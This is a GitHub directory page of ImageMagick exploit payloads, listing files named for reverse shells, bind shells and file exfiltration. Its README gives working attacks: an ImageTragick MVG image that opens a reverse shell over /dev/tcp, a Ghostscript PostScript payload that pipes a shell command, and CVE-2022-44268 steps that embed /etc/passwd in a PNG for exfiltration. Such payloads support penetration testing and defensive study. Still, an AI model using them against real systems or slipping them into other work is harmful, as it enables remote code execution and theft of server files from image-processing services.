Skip to content

Latest commit

 

History

History
 
 

Picture ImageMagick

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
convert_local_etc_passwd.svg
convert_local_etc_passwd.svg
 
 
convert_local_etc_passwd_html.svg
convert_local_etc_passwd_html.svg
 
 
ghostscript_rce_curl.jpg
ghostscript_rce_curl.jpg
 
 
imagemagick_CVE-2022-44268_convert_etc_passwd.png
imagemagick_CVE-2022-44268_convert_etc_passwd.png
 
 
imagemagick_ghostscript_cmd_exec.pdf
imagemagick_ghostscript_cmd_exec.pdf
 
 
imagemagik_ghostscript_reverse_shell.jpg
imagemagik_ghostscript_reverse_shell.jpg
 
 
imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
 
 
imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
 
 
imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
 
 
imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
 
 
imagetragik1_payload_imageover_wget.gif
imagetragik1_payload_imageover_wget.gif
 
 
imagetragik1_payload_url_bind_shell_nc.mvg
imagetragik1_payload_url_bind_shell_nc.mvg
 
 
imagetragik1_payload_url_curl.png
imagetragik1_payload_url_curl.png
 
 
imagetragik1_payload_url_portscan.jpg
imagetragik1_payload_url_portscan.jpg
 
 
imagetragik1_payload_url_remote_connection.mvg
imagetragik1_payload_url_remote_connection.mvg
 
 
imagetragik1_payload_url_reverse_shell_bash.mvg
imagetragik1_payload_url_reverse_shell_bash.mvg
 
 
imagetragik1_payload_url_touch.jpg
imagetragik1_payload_url_touch.jpg
 
 
imagetragik1_payload_xml_reverse_shell_nctraditional.xml
imagetragik1_payload_xml_reverse_shell_nctraditional.xml
 
 
imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
 
 
imagetragik2_burpcollaborator_passwd.jpg
imagetragik2_burpcollaborator_passwd.jpg
 
 
imagetragik2_centos_id.jpg
imagetragik2_centos_id.jpg
 
 
imagetragik2_ubuntu_id.jpg
imagetragik2_ubuntu_id.jpg
 
 
imagetragik2_ubuntu_shell.jpg
imagetragik2_ubuntu_shell.jpg
 
 
imagetragik2_ubuntu_shell2.jpg
imagetragik2_ubuntu_shell2.jpg
 
 

README.md

ImageMagick Exploits

ImageTragik Exploit v1

Simple reverse shell

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

ImageTragik Exploit v2

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

CVE-2022-44268

Information Disclosure: embedded the content of an arbitrary remote file

  • Generate the payload 
    apt-get install pngcrush imagemagick exiftool exiv2 -y
pngcrush -text a "profile" "/etc/passwd" exploit.png
  • Trigger the exploit by uploading the file. The backend might use something like convert pngout.png pngconverted.png
  • Download the converted picture and inspect its content with: identify -verbose pngconverted.png
  • Convert the exfiltrated data: python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'

Thanks to